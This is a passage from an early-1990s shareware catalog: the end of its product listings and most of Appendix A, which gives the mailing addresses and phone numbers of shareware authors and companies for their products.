Support by mail. + Version: IIIa (07-01-91) + User benefits: Latest version with shareware notices removed. + Support by mail. + Look for: SIMLAB3A.ZIP on BBSs (call 709-489-6018 to download it + at no charge). + Download size: 270k + Description: + Design free form labels. Many features including a full label + editor with Qwik keys. Printing options include multiple + copies, multiple labels across, auto centering, envelope or + report formats and many others. + + Other features include sorting on any part of a label, many + types of searches, import text, read dBase III files, custom + colors, Date and Time stamps, non-printing lines, DOS shell, 70 + page manual and many more. Applications include mailing + labels, disk labels, cassette jackets... + + Chapter 19, "Other" 432 + + + + Product: STAFF-DEVELOPER + Needs: IBM PC, DOS 3.0 or better. 640k RAM, hard disk. + Extended/expanded memory recommended. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $399.00 + Registration benefits: Free distribution licence of the RunTime + Module. The name of the data base developer will be shown in + the RunTime software at visible place. + Version: 1.0 (06-01-91) + User benefits: Free distribution licence of the RunTime Module. + The name of the data base developer will be shown in the + RunTime software at visible place. + Look for: availability unknown on BBSs. + Download size: 560k + Special instructions: Product distribution restricted to the + United States. + Description: + This is for the developer of database applications who want to + bundle one of the STAFF-FAMILY members with his data. The + software is delivered with the license for the unlimited + distribution of the respective RunTime version as part of the + specific application. The free distribution license for the + RunTime version of each STAFF module costs US$ 399.00. This is + advantageous for data vendors and for organizations in which + large amounts of the same data are used on many PC's. + + Appendix A, "Author addresses" 433 + + + + + + Appendix A + Author addresses + + This appendix cross-references each author to his or her pro- + duct(s). If you want to know where to write or call about a + particular product, look for it in the index and write down the + page number where the product name appears in this appendix. + Then turn to the appropriate page in this appendix and look up + the author. + + + Product: Flags, Wynd-DOS, Wyndfields for DOS, Wyndfields for + Windows, Wyndshell + Wyndware + Address: One Parker Place, Suite 308, Janesville, WI 53545 + Orders: 800-475-1628 + Fax: 608-754-5290 + Queries: 608-755-1628 + + Product: Data Master, Label Master, Task Master + RKS Software, Inc. + Address: 3820 North Dittmar Road, Arlington, VA 22207 + Orders: 703-534-1726 + Fax: 703-534-1726 + Queries: 703-534-1726 + + Product: VEHICLE COSTS + Graham Ferguson + Address: 3 Cristata ave. Endeavour Hills Victoria 3802 + AUSTRALIA + Orders: (03) 700-3764 + Queries: (03) 700-3764 + + Product: PoeTrio, Poetry Star + Chatfield Software, Inc. + Address: 11681 Hayden St., Box 115, Hiram, OH 44234-0115 + Orders: 216-569-3201 + Fax: 216-569-7689 + Queries: 216-569-3201 + + Product: Parcel Shipping Program(PSP)(r) + East Hampton Industries + Address: 81 Newtown Lane, Box 5069, East Hampton, NY 11937 + Orders: 800-645-1188 + Fax: 516-324-2248 + Queries: 516-324-2224 + + Appendix A, "Author addresses" 434 + + + + Product: NETCLASS + Pyramid Software + Address: 840 Hooper Rd., Suite 115, Endwell, NY 13760 + Orders: 607-748-6630 + Fax: 607-786-0612 + Queries: 607-748-6630 + + Product: The Laughing Dog Screen Maker + Yardbird Software + Address: P.O. Box 4646, West Hills, CA 91308 + Orders: 800-242-4PSL + Queries: 818-704-6402 + + Product: GradeBook for Windows + Russell Stevens + Address: 5191 Pine Grove Dr., Spruce, MI 48762 + + Product: THE INTERSTATE TRAVELER + David E. Jacobson + Address: 1222 Harris Drive, Bartlesville, OK 74006 + Orders: 918-333-7563 + Queries: 918-333-7563 + + Product: PhoneBook + Robert M. Bernard + Address: P.O. Box 382124, Memphis, TN 38183-2124 + + Product: ToyBox II + Virtual Magic Software + Address: P.O Box 615 Fort Monmouth, NJ 07703 + + Product: Snooper, the system checker + John Vias + Address: P.O. Box 8234, Gainesville, FL 32605-8234 + Orders: 904-332-8234 + Queries: 904-332-8234 + + Product: Ethics Awareness, Japanese Business Culture, Play For + Mate, Service Business Design + Niche Software + Address: PO Box 2554, Seal Beach, CA 90704-1554 + Queries: 714-892-9052 + + Product: Instant Access Menu System + Prodigy Technologies + Address: 14611 Carmel Ridge Road, San Diego, CA 92128 + Orders: 619-673-0722 + Fax: 619-487-5733 + Queries: 619-673-0722 + + Appendix A, "Author addresses" 435 + + + + Product: 4FILES + Hand-Crafted Software + Address: P.O. Box 6001 Sitka, AK 99835 + Orders: 907-747-8996 + Queries: 907-747-8996 + + Product: Textshot + McAdams Associates + Address: P.O. Box 835505, Richardson, TX 75083-5505 + + Product: EQUALIZER + Nine-Patch Software + Address: 315 South Alco Avenue, Maryville, MO 64468-2033 + + Product: DJ-CHECK, DJ-LOPE, DJ-SLEEVE, LJ-SLEEVE, PM2LINO, PS- + SLEEVE, PS-TEXT + JMJ Software + Address: 5000 Valley Stream Road, Charlotte, NC 28209 + Orders: 704-525-1472 + Queries: 704-525-1472 + + Product: DOWNLOAD, LJ2DJ, LJLAND, Mail Machine, PCX2FNT, PCX2PCL + TaxWare + Address: PO Box 2014, Provo, UT 84603-2014 + Orders: 800-242-4775 + Queries: 801-373-0541 + + Product: FISHBYTE(tm) + EJM Computer Consulting Ltd. + Address: PO Box 154, East Meadow, NY 11554 + Orders: 516-483-7561 + Queries: 516-483-7561 + + Product: DaMenu + Just-In-Time Computing Services + Address: P.O. Box 4166, Ithaca, NY 14852 + Orders: 607-257-6517 + Queries: 607-257-6517 + + Product: BootMaster + RoSi Software + Address: Keithstr. 4, 1000 Berlin 49, GERMANY + Orders: 011-49-30-744-7707 + Fax: 011-49-30-744-7618 + Queries: 011-49-30-744-7707 + + Product: Business Plan Master (IBM), Business Plan Master (Mac) + Grand Universal + Address: 7061 East Wesley Avenue, Denver, CO 80224 + Orders: 303-756-2175 + Queries: 303-756-2175 + + Appendix A, "Author addresses" 436 + + + + Product: Music Manager for Windows + Joe Herrera + Address: 2405 Westview, Denton, TX 76201 + Queries: 817-382-7585 + + Product: CALC_JNC + James N. Cox + Address: 418 Erie Avenue. Quakertown, PA 18951 + + Product: SAFEPACK + D J Harvey Software + Address: PO Box 14, Cardiff CF4 6XW, UNITED KINGDOM + Fax: +44-222 743029 + + Product: APCAL, CLOCK, FCOMP + Gamma Software + Address: P.O. Box 8191, Fort Collins, CO 80526 + Orders: 800-747-9960 + Queries: 303-667-9960 + + Product: NEWBIZ + Centre for Commercial Innovation (CCI) + Address: P.O. Box 286, 6800 AG Arnhem, HOLLAND + Fax: +31-20.6763706 + + Product: Decoder!, Filer!, Index!, Swap!, Tag!, TDisplay + Trinity Software + Address: 13550 Frost Drive Nokesville, VA 22123 + Orders: 703-791-2576 + Fax: 703-791-4250 + Queries: 703-791-2576 + + Product: Master Meal Manager, PC-TRACK + Thomas C. Johnson + Address: 9920 S. Palmer Rd., New Carlisle, OH 45344 + Queries: 513-878-9174 + + Product: Public Address + Paradise Programming + Address: P.O. Box 1231 Shelton, WA 98584-0948 + Orders: 800-847-0309 + Queries: 206-352-9863 + + Product: AC11TO10, PURGE + Software Designs, Inc. + Address: 858 Austerlitz Road, Paris, KY 40361-9055 + Orders: 606-987-6129 + Queries: 606-987-6129 + + Product: NAMEBASE + Elk Creek Software + Address: 13630 Rampart Drive, Conifer, CO 80433-5106 + Orders: 800-242-4775 + Queries: 303-838-5796 + + Appendix A, "Author addresses" 437 + + + + Product: Tolman Dental Program + Peter T. Smith D.D.S. + Address: 455 Neighborhood Rd. + Orders: 516-281-5544 + Fax: 516-281-5698 + Queries: 516-281-5544 + + Product: The Cipher-Ace Series + Charles W. Stewart + Address: 1197 Pickerel Cir, Orlando, FL 32839 + Queries: 407-855-6148 + + Product: PrinterBUDDY + Lenard Dean + Address: Box 73094, Woodbine Postal Outlet, Calgary, Alberta + T2W6E0 CANADA + + Product: PrintEnvelope + Maurer Associates + Address: 15 Lakeside Plaza, 164 Lake Street, Newburgh NY + 12550-5243 + Fax: 914-562-6613 + Queries: 914-562-6600 + + Product: EASY BANKING + The Durol Company + Address: 5825 Malvern Ave., Burnaby, BC, V5E 3E6, CANADA + Orders: 604-524-1765 + Queries: 604-524-1765 + + Product: FDplot, HandyDOS + Abri TEchnologies, Inc. + Address: HCR 62, Box 100K, Great Cacapon, WV 25422 + + Product: LambChop + LambWare + th + Address: 6955 29 Terrace North, St Pete, FL 33710 + Orders: 813-525-3162 + Queries: 813-525-3162 + + Product: CROSSDOWN, ENIGMACROSS + CROSSDOWN + Address: 133 Akron Street Rochester, NY 14609-7618 + Queries: 716-482-8092 + + Appendix A, "Author addresses" 438 + + + + Product: $tokTraX + Stoktrax Systems + Address: 2419 Hodges Bend Circle, Sugar Land, TX 77479 + + Product: ClipMate for Windows + Chris Thornton + Address: P.O. Box 26263, Rochester, NY 14626 + + Product: Save the Planet + Save the Planet Software + Address: P.O. Box 45, Pitkin, CO 81241 + Orders: 303-641-5035 + Queries: 303-641-5035 + + Product: My Little Realm + My Little Realm + Address: 637 Wyckoff Avenue, Suite 297, Wyckoff, NJ 07481 + + Product: YieldBook + Compound Solutions + Address: 1170 Bower Hill Road - #614, Pittsburgh, PA 15243 + + Product: Home Sales System + Grumpyware + Address: 9794 Forest Lane, Suite 127, Dallas, TX 75243 + Orders: 214-340-5231 + Queries: 214-340-5231 + + Product: NED + David L. Dight + Address: P.O. Box 280 Kings Cross, N.S.W. 2011 AUSTRALIA. + Fax: +61-2 251-1072 + Queries: +61-2 331-4521 + + Product: Collect! (VGA version) + Alston Software Labs + Address: 1320 Standiford Ave Suite #242 Modesto CA 95350 + Orders: 209-522-8666 + Fax: 209-522-8666 + Queries: 209-522-8666 + + Product: FlexBase + National MicroSystems + Address: #1210 - 341 Bloor Street West, Toronto, Ontario, + Canada M5S 1W8 + Orders: 416-599-1228 + Queries: 416-599-1228 + + Product: LEANER + MoonStone Software + Address: P.O. Box 32725, Phoenix, AZ 85064 + Orders: 602-955-4266 + Queries: 602-955-4266 + + Appendix A, "Author addresses" 439 + + + + Product: PixFolio Image Catalog System + ACK Software + Address: 298 W. Audubon Drive, Shepherdsville, KY 40165-8836 + Orders: 502-955-7527 + Queries: 502-955-7527 + + Product: AM-EDIT + PLC Software + Address: 1572 Montgomery Highway; Suite 104D; Birmingham, AL + 35216 + Orders: 205-822-1619 + Queries: 205-822-1619 + + Product: Diamond Data, On This Day + The Software Construction Co. + Address: P.O. Box 160, North Billerica, MA 01862-0160 + + Product: PUTMAIL, See Mail + Gnosis Inc + Address: 7116 Lory Lane, Lanham, MD 20706-1114 + Orders: 800-359-9998 + + Product: PC Chart (CGA/HGC), PC-CHART (EGA/VGA) + Guru Systems Ltd. + Address: 314 E. Holly #106, Bellingham, WA, 98225-4736 + Orders: 604-299-1010 + Queries: 604-299-1010 + + Product: Serial++ Asynch Comm Library + Cortlandt Technologies + Address: P.O. Box 195, Pleasantville NY 10570 + Orders: 914-737-8649 + Queries: 914-737-8649 + + Product: 3 ball Juggler + First Magnitude + Address: 175 E. Alex-Bell Rd. Suite 220-316 Dayton OH 45459 + Queries: 513-436-0232 + + Product: KP5 + Peter Charpentier + Address: 47 Meeting House Hill Rd, Durham, CT 06422 + + Product: REXL-Lazarillo de Tormes + REXL + Address: 734 Camino Catalina, Solan Beach, CA 92075 + Queries: 619-481-0781 + + Product: Sell More Software + Droege Computing Services, Inc. + Address: 3200 Croasdaile Drive, Ste 304, Durham NC 27705 + Orders: 919-383-9749 + Fax: 919-382-7422 + Queries: 919-383-9749 + + Appendix A, "Author addresses" 440 + + + + Product: The Better Diet Analyzer + Syntonic Software + Address: 3824 Dunlanwood Circle, Charlotte, NC 28226 + Orders: 800-242-4775 + Queries: 704-542-0473 + + Product: ACCEL + JSOFT + th + Address: 4108 14 Ave S. + Orders: 612-823-7197 + Queries: 612-823-7197 + + Product: EDWORD + FAGERLUND CONSULTING + Address: Lonsdale West Postal Outlet, Box 54053, North + Vancouver, B.C., CANADA, V7M 3L5 + Orders: 604-984-7330 + Queries: 604-984-7330 + + Product: Computer Trivia Quiz + Shoestring Software + Address: P.O. Box 43800, Las Vegas, NV 89116 + + Product: Lotto Thunder + Charles P.Staats + Address: P.O. Box 6514, Thousand Oaks, CA., 91359 + + Product: Aerosoft Fitness Log + Aerosoft + Address: PO Box 501010, Indianapolis, IN 46256 + Orders: 317-849-7659 + Queries: 317-849-7659 + + Product: Stable - Technical Graphs + WINTERRA Software Group + Address: PO Box 4106, Highlands Ranch, CO 80126 + Orders: 303-470-6323 + Fax: 303-470-6323 + Queries: 303-470-6323 + + Product: fastmenu GOLD + jwh: SoftWare + Address: PO Box 410, 9500 St.Rt.61, Berlin Heights, OH 44814 + Orders: 419-588-3608 + Queries: 419-588-3608 + + Appendix A, "Author addresses" 441 + + + + Product: PAGE COUNT, TEACHER, YRWAY, YRWAYx.ZIP + Tinker Software + Address: P.O. Box 3429, Kent, WA 98032 + Fax: 206-852-7708 + + Product: PREP + Southwind Software + Address: P.O. Box 273228, Concord Ca., 94527-3228 + + Product: TransferTIME (TTIME) + RGH Software + Address: Route 1, Box 24 Reed City, MI 49677-9801 + Queries: 616-832-4694 + + Product: Professional Master Key + Public Brand Software + Address: 3750 Kentucky Ave Indianapolis IN 46241 + Orders: 317-856-7571 + Queries: 317-856-7535 + + Product: BRAINdead2 + Michael Donat + Address: P.O.Box 948 Springdale AR 72765-0948 + Orders: 501-442-0301 + Queries: 501-442-0301 + + Product: DOS Extensions for Professional + Allison Software + Address: 166 Shady Lane, Apollo, PA 15613 + Orders: 800-837-1492 + Queries: 412-727-2198 + + Product: Personal Golf Tracker + John L. Hancock + Address: 2713 Trelawny Dr. Clarksville, TN 37043 + + Product: KEYTREE TOOLBOX, KEYTREE UTILITIES + REWSE CONSULTANTS LIMITED + Address: 44 HORSESHOE ROAD, PANGBOURNE, BERKSHIRE RG8 7JL, UK + Orders: 0734 842443 + + Product: PCStat + PC Information Systems + Address: 1517 S. Virginia Suite 259, Reno, NV 89502-2807 + Orders: 800-242-4775 + Queries: 702-342-0376 + + Product: Folders, Sloop Manager + Sloop Software + Address: 6457 Mesedge Lane, Colorado Springs, CO 80919 + Queries: 719-260-0433 + + Appendix A, "Author addresses" 442 + + + + Product: EliteCheck + Taewoong Jeon + Address: P.O. Box 166101, Chicago, IL 60616-6101 + Orders: 800-2424-PSL + + Product: CM_FILER + NoVaSoft + Address: 3239 Riverview Dr., Triangle, VA 22172 + Orders: 703-221-1833 + Queries: 703-221-1833 + + Product: EVA, Listico, PRO$TOCK, PROPLUS + Gateway Software + th + Address: 61 East 8 Street, Suite 128, New York, NY 10003 + + Product: Money Smith + Money Smith Systems + Address: P.O. Box 333 + + Product: DiscTrak System, MuziTrak System + Blam Entertainment Group + Address: 78 McLennan Way, Kanata ONT K2L 2T2 CANADA + Orders: 613-831-4064 + Queries: 613-831-4064 + + Product: Movie Guide + SANDD Software + Address: PO Box 3587 Reston VA 22090 + Orders: 800-2424-PSL + Queries: 703-444-8655 + + Product: HOME BUDGET MANAGEMENT SYSTEM, The LOTTO SIMULATOR + Brentson Worrell + Address: 6404 Mornay Dr. Tampa, FL 33615 + Orders: 813-886-2282 + Queries: 813-886-2282 + + Product: -=Tab123=-, Custom#Menu, LaunchCAD + Mountain Software + Address: 1579 Nottingham Road, Charleston, WV 25314 + Orders: 800-242-4775 + Queries: 304-744-7748 + + Product: Browse/2 + Wolf Software Design + Address: 6369 Caminito Flecha, San Diego, CA 92111 USA + Orders: 619-292-7706 + Queries: 619-292-7706 + + Appendix A, "Author addresses" 443 + + + + Product: ConvDW, TextCon, TextOut/5 + CrossCourt Systems + Address: 1521 Greenview Ave., East Lansing, MI 48823 + Orders: 517-332-4353 + Queries: 517-332-4353 + + Product: Command Post, WinBatch, WinCheck, WinEdit + Wilson WindowWare, Inc. + Address: 2701 California Ave SW #212 + Orders: 800-762-8383 + Fax: 206-935-7129 + Queries: 206-937-9335 + + Product: DICOGO, DIMANAGE + DI Management Corporation + Address: PO Box 429152, Cincinnati, OH 45242 + Queries: 513-831-4122 + + Product: QPACS, XPENS + Richard A. Williams + Address: P.O. Box 9311, Crystal Lake, IL 60014 + Queries: 815-455-6333 + + Product: Flex + Logical Systems + Address: PO Box 181, Jacksonville AR 72076-0181 + + Product: TAPCIS + Support Group, Inc. + Address: Lake Technology Park, McHenry, MD 21541-0130 + Orders: 800-USA-GROUP + Fax: 301-387-7322 + Queries: 301-387-4500 + + Product: CALendar preview for SideKick 2, CALendar RePorT for + SideKick+, CALendar report for TRaVel, Resident Task Manager + WetZoft Applications + Address: 788 Martin Ct West Severn MD 21144-2213 + Orders: 301-969-9385 + Queries: 301-969-9385 + + Product: Book of Changes, By the Numbers, Citizen, Creativity + Package, Crystal Ball, Curses!, Fortune Teller, Geomancy, Hard + at Work, I.Q. Challenge, LoveDOS, Maillist / M-Label, Mayan + + Appendix A, "Author addresses" 444 + + + + Calendar, Personal Tarot, Poetry Generator, Recap, Richard + Webster Programs, Workbase, Your ESP Test + R.K. West Consulting + Address: P.O. Box 8059, Mission Hills, CA 91346 + Orders: 800-788-0787 + Fax: 314-966-1833 + + Product: 4EDIT, 4ZIP/4UNZIP, XDIR + XD Systems + Address: 1014 Shipman Lane, McLean, VA 22101 + Orders: 703-821-3215 + Queries: 703-821-3215 + + Product: Family Tree Print Utility + Common Sense Software + Address: 2068 Trailwood Drive Cincinnati, OH 45230-1494 + Orders: 513-231-0730 + Queries: 513-231-0730 + + Product: AutoCon + Larry Weaver + Address: PO Box 2639, Weaverville, CA 96093-2639 + Orders: 916-623 5045 + Queries: 916-623 5045 + + Product: ALLY, CADET + Wasco Technical Software + Address: 1211 Grand Junction Drive, Katy, TX 77450 + Orders: 713-392-1359 + Fax: 713-392-1359 + Queries: 713-392-1359 + + Product: SwimBase + Words to Go + Address: 2710 Apple Way, Dunkirk, MD 20754-9705 + Orders: 301-855-6427 + Queries: 301-855-6427 + + Product: PC-ECAP + Circuit Systems + Address: 418 Church Road, Sicklerville, NJ 08081-1727 + Orders: 800-242-4775 + Queries: 609-875-5433 + + Product: Paint Shop Pro + JASC, Inc. + Address: 17743 Evener Way, Eden Prairie, MN 55346 + Orders: 612-934-7117 + Fax: 612-934-7117 + Queries: 612-934-7117 + + Appendix A, "Author addresses" 445 + + + + Product: Multilevel Marketing Simulator + LRV Company + Address: PO Box 631, Nesconset, NY 11767 + Queries: 516-360-9178 + + Product: Book Librarian, Household Register, Video Librarian + TurboSystemsCo + Address: P.O. Box 965368, Marietta Ga. 30066 + Orders: 404-516-8575 + Queries: 404-516-8575 + + Product: Church Membership Tracking Sys, Home Helper, Smart Home + Shopper + Torbert Data Systems, INC. + Address: P. O. Box 9218 Chesapeake, VA 23321 + Orders: 804-488-5506 + Queries: 804-488-5506 + + Product: PACE, Probat + Mark Tigges + Address: 2925 Altamont Cresent, West Vancouver, BC, V7V 3B9 + Orders: 604-926-0366 + Queries: 604-926-0366 + + Product: BCS Menu Program + Bristol Computing Systems, Inc. + Address: Suite 162, 200 Linden Street, P.O. Box 9009, + Wellesley, MA 02181 + + Product: Calculation Solitaire, Canfield For Windows, ZiPaper + Daniel Thomas + Address: 2301 North Huron Circle, Placentia, CA 92670 + Queries: 714-524-5625 + + Product: dtSearch + DT Software, Inc. + Address: 2101 Crystal Plaza Arcade, Suite 231, Arlington, VA + 22202 + Orders: 800-242-4775 + Fax: 713-524-6398 + + Product: Easy Access + TengWare Enterprises + Address: 28162 Amable, Mission Viejo, CA 92692 + Orders: 714-587-1025 + Queries: 714-587-1025 + + Product: LOGIK MENU + LOGIVISION INC. + Address: P.O. Box 396, Sherbrooke, Qc, Canada, J1H 5J7 + Orders: 819-823-6761 + Fax: 819-823-8000 + Queries: 819-823-6761 + + Appendix A, "Author addresses" 446 + + + + Product: ZZT Arcade-Adventure Game + Potomac Computer Systems + Address: 10406 Holbrook Drive + + Product: Bmenu + Mark Strong + Address: 2936 Orchard Knoll Ct, Cincinnati, OH 45239 + Orders: 800-2424-PSL + Fax: 713-524-6398 + + Product: CatScan + Rochester Heritage + Address: 72 Knapp Ave. Rochester, NY 14609 + + Product: Integrity Master(tm), MAZE3 + Stiller Research + Address: 2625 Ridgeway St., Tallahassee, FL 32310 + Orders: 800-788-0787 + Fax: 904-575-7884 + Queries: 904-575-7884 + + Product: Brother's Keeper + John Steed + Address: 6907 Childsdale Rd., Rockford, MI 49341 + + Product: Federal Express Label Printer + TVSware (Tom Sollas) + Address: 77 Main Avenue, Unit 3A, Ocean Grove NJ 07756 + Orders: 908-774-6402 + Queries: 908-774-6402 + + Product: Btr Help!, Btr Watch, Mass-Store Copy, Volcano Hunter + Informative Technologies + Address: 1718 M Street NW, Suite 292, Washington, DC, + 20036-4504 + Orders: 800-2424-PSL + Fax: 202-676-4529 + Queries: 202-675-4528 + + Product: PAK + NoGate Consulting + Address: PO Box 88115 Grand Rapids MI 49518-0115 + Orders: 616-530-9950 + Fax: 616-530-2676 + Queries: 616-530-9950 + + Appendix A, "Author addresses" 447 + + + + Product: Recon(tm) + Amdox Co. Ltd. + Address: 217 Terrace Hill Street, Brantford, Ontario, Canada + N3R 1G8 + Orders: 519-752-5453 + + Product: HiMOVE + C.Sitte Softwaretechnik + Address: Postfach 42, A-5025 Salzburg, AUSTRIA + + Product: DOS Summary, DOS Summary (Hypertext), TUTOR.COM + Computer Knowledge + Address: PO Box 91176, Los Angeles, CA 90009-1176 + + Product: BATUTIL, STACKEY + CTRLALT Associates + Address: Suite 133, 260 South Lake Ave., Pasadena, CA 91101 + Orders: 800-872-4768 + + Product: EDDY (EDit DirectorY) + John Scofield + Address: 22304 Gilmore St., Canoga Park, CA 91303 + + Product: BakupWiz + PCX + Address: 4874 Alberson Court, Suite 110, Carmel Valley, CA + 92130 + Orders: 619-259-9797 + Fax: 619-481-6474 + Queries: 619-259-9797 + + Product: BESTTEST + WiseWare + Address: P.O. Box 148130 Chicago, IL 60614 + + Product: PC-FOOD + Schreck Software + Address: 1420 Interlachen Circle, Woodbury, MN 55125 + Orders: 612-731-6822 + Queries: 612-731-6822 + + Product: DialThat, LaserForm, Mercury + Real Software + Address: PO Box 1680, Soquel, CA, 95073 USA + Orders: 408-476-3550 + Fax: 408-476-3550 + Queries: 408-476-3550 + + Appendix A, "Author addresses" 448 + + + + Product: Time is Money + Custom Data Solutions + Address: 248 Wood Lake Drive, Maitland, FL 32751 + Orders: 407-767-9278 + Fax: 407-767-9712 + + Product: PC Canary, TimeTrac + Compass / New England + Address: POBox 117, Portsmouth, NH 03802-0117 + Orders: 603-431 8030 + Queries: 603-431 8030 + + Product: AlbumMaster, CassetteMaster, CDMaster, CompUser, + DayMaster, DiZk4D, LessonPlanZ, OMNIDay, OMNIDiZk, OMNIMeal, + PostCardMaster, SoundZ, VideoMaster, WordZ, ZideCar, Zpeller + Unicorn Software Limited + Address: P.O. Box 911 Wabash, IN 46992-0911 + Orders: 800-2424-PSL + Queries: 219-563-HOME + + Product: LQMATRIX, MEMORY + Jimmy Paris Software + Address: 906 Old Farm Rd., Charlottesville, VA 22903 + Queries: 804-295-5496 + + Product: DISK SPOOL II + Budget Software Company + Address: P.O. Box 12282; Aurora, CO 80012 + Orders: 303-695 9095 + Queries: 303-695 9095 + + Product: BOOT.SYS + Hans Salvisberg + Address: Bellevuestr. 18, CH-3095 Berne, SWITZERLAND + + Product: pE - The "perfect" Editor(tm) + Just Excellent Software, Inc. + Address: P.O. Box 1996, Media, PA 19063 + Queries: 215-565-7780 + + Appendix A, "Author addresses" 449 + + + + Product: Technical Editor + Superior Soft + Address: P.O. Box 17355, Irvine, CA 92714 + + Product: NAMEGRAM, PIANOMAN + Neil J. Rubenking + Address: 86 Midcrest Way, San Francisco, CA 94131 + Orders: 800-USA-GROU + + Product: PC-INFO + Cheat River Engineering + Address: 23 Richwood Place / P. O. Box 289 / Denville, NJ + 07834-0289 + Orders: 201-627-5460 + Queries: 201-627-5460 + + Product: Brandon's Bigbox, Hotnet + Robichaux and Associates + Address: P. O. Box 82311 + Orders: 504-752-2620 + Queries: 504-752-2620 + + Product: BLANK-IT, TrikTrak + Rhode Island Soft Systems, Inc. + Address: P.O. Box 748, Woonsocket, RI 02895 + Orders: 401-658-4632 + Fax: 401-658-4632 + Queries: 401-658-4632 + + Product: ALPHAQUOTE, CODE TO CODE + AlphaBytes, Inc. + th + Address: 111 8 St., S.E., Washington, DC 20003 + Orders: 202-546-4119 + Fax: 202-547-5133 + Queries: 202-546-4119 + + Product: Convert To Structured BASIC, Mille French Card Game, + PBfmt, Total Control, Your Numerologist + Unique Software + Address: P.O. Box 26613, Ft. Worth, TX 76126-0613 + Fax: 817-249-4284 + + Product: HyperPAD, Show Partner Lite + Brightbill-Roberts and Company, Ltd. + Address: 421 University Building, Syracuse NY 13202 + Orders: 800-444-3490 + Fax: 315-472-1732 + Queries: 800-444-3490 + + Appendix A, "Author addresses" 450 + + + + Product: BridgePal, Names & Dates, PC-Names + WR Software + Address: PO Box 4819 + Orders: 415-930-0369 + Queries: 415-930-0369 + + Product: VAR Grade + VARed Software + Address: 1490 Calle Fidelidad Thousand Oaks, CA 91360-6819 + Orders: 800-2424-PSL + Queries: 805-523-7546 + + Product: 4DOS + JP Software Inc. + Address: P.O. Box 1470, East Arlington, MA 02174, USA + Orders: 800-368-8777 + Fax: 617-646-0904 + Queries: 617-646-3975 + + Product: PrintCAD, PrintGL, Ravitz Editor + Ravitz Software Inc. + Address: P.O. Box 25068, Lexington, KY 40524-5068 + Queries: 606-268-4223 + + Product: XRS ("eXpress Response System") + Smokin' Software + Address: 995 Buck Hall Landing, McClellanville, S.C. 29458 + Orders: 803-928-3332 + Queries: 803-928-3332 + + Product: InContext + Rams' Island Software + Address: 7644 Lakecliff, Parker, CO 80134-5904 + Orders: 303-841-2848 + Queries: 303-841-2848 + + Product: SWAPDOS, SWAPDS, SWAPLM, SWAPMM, SWAPNG, SWAPSK, SWAPTN, + TCXL User Interface Development, TesSeRact Compression System, + TesSeRact File Management, TesSeRact Printer Control, TesSeRact + Screen Designer, TesSeRact TSR Devel. System + Innovative Data Concepts, Inc. + Address: 122 North York Road, Suite 5, Hatboro. PA 19040 + Orders: 215-443-9705 + Fax: 215-443-9753 + Queries: 215-443-9705 + + Product: WinGraph + XWare, Inc. + Address: 1674 Broadway, New York, NY 10019 + Orders: 212-262-4982 + Queries: 212-262-4982 + + Appendix A, "Author addresses" 451 + + + + Product: ORGANIZE + David H. Pritchett + Address: P.O. Box 7273 Macon, GA 31209-7273 + + Product: Charge Account Management Prog., Checkbook Management + Program, Savings Account Management Prg. + M. P. Data + Address: 113 Foxport Dr., Kingsport, TN 37664-5626 + Queries: 615-349-7744 + + Product: Simply Help!, Simply Labels + SimpleWare + Address: P.O. Box 877 Windsor, NF Canada A0H 2H0 + Queries: 709-489-3757 + + Product: Painless Accounting, Painless Acct/Payroll Companion, + Painless Event Processor, Painless Menu Manager, Painless + Payroll + Painless Accounting + Address: 4401 Birdsong Plano, TX 75093 + Orders: 800-521-9905 + Fax: 214-596-9164 + Queries: 800-521-9905 + + Product: AMORTIZATION TABLE, ELECTRON, FAST INVOICE WRITER, FAST + STATEMENT WRITER, MULTIFILE-XL, PAYMENT BOOK WRITER + H&P Software + Address: 218 Newman Avenue, Pueblo, CO 81005 + Orders: 719-561-0810 + Queries: 719-561-0810 + + Product: Easydial, PALERT, PATTR, PCOPY, PDAILY, PDEL, PPRINT, + PSEARCH, PTOUCH, RECALL + Patri-Soft + Address: 2900 Adams St. Suite C-210, Riverside, CA 92504 + Orders: 800-242-4775 + Fax: 714-352-1527 + Queries: 714-352-2820 + + Product: Easy Project + Parcell Software + Address: P.O. Box 165 Geneva, Il 60134 U.S.A. + Orders: 708-232-6328 + Fax: 708-232-6339 + Queries: 708-232-6328 + + Product: DMPLAS (Dot Matrix to LaserJet), Layout + Software Co-op + Address: 5437 Honey Manor Dr Indianapolis IN 46241 + Orders: 317-856-6052 + Queries: 317-856-6052 + + Appendix A, "Author addresses" 452 + + + + Product: Bass Class, BassTour, Tikler + Olsen Outdoors + Address: 68 Hartwell Avenue, Littleton, MA 01460 + Queries: 508-486-3042 + + Product: PathProj, RXridge, RXtraces + softRX shareware + Address: 5261 Woodfield Drive North; Carmel, IN 46032-8795 + + Product: Cash Control + Adrian-Thomas Developments, Inc. + Address: P.O Box 532, Orleans, Ontario, Canada, K1C 1S9 + Orders: 613-837-0684 + Queries: 613-837-0684 + + Product: Magic Brush & Magic Show, What's Up(tm) + Nassib Nassar + Address: 4035 Livingstone Pl., Durham, NC 27707 + + Product: SeedMaster + White Harvest Software, Inc. + Address: P.O. Box 97153 + Orders: 919-870-0775 + Queries: 919-870-0775 + + Product: MakeDemo + WindhamWoods Publishing + Address: P. O. Box 314, Windham, NH 03087 U. S. A. + Orders: 800.487.2667 + Queries: 603.893.2667 + + Product: Badge-O-Magic, dLITE, WAMPUM, Zephyr + Ward Mundy Software + Address: 4160 Club Drive, Atlanta, GA 30319 + Orders: 404-237-9420 + Fax: 404-237-1167 + Queries: 404-237-9420 + + Product: pEDIT PLUS + T. G. Muench + Address: P.O. Box 11536, Prescott, AZ 86304-1536 + Queries: 602-445-2479 + + Product: DasBOOT!, EGAWHEEL, VGAWHEEL, WINWHEEL + WHEEL Games + Address: 507 Washington Gdns, Washington, NJ 07882-9205 + + Product: The Children's Graphics Program, Dad's Choice, Dr. + Motes' Colorbook, Mom's Math, School-Mom + Motes Educational Software + Address: 1632 Brooks St., Fayetteville, AR 72701 + Orders: 501-442-5652 + Queries: 501-442-5652 + + Appendix A, "Author addresses" 453 + + + + Product: Disk OrGanizer (DOG) + Soft GAM's Software + Address: P. O. Box 1311, Mendocino, CA 95460-1311 + Queries: 707-961-1632 + + Product: dBF-View, STAFF-BASE, STAFF-DBMS-PRODUCT-FAMILY, STAFF- + DEVELOPER, STAFF-DIAL, STAFF-GRAF, STAFF-INTEGRATOR, STAFF- + KICK, STAFF-MASK, STAFF-REPORT, STAFF-UTIL + MSC - Morariu Software Consulting + Address: Im Mainfeld 23, D-6000 Frankfurt/M 71, Germany 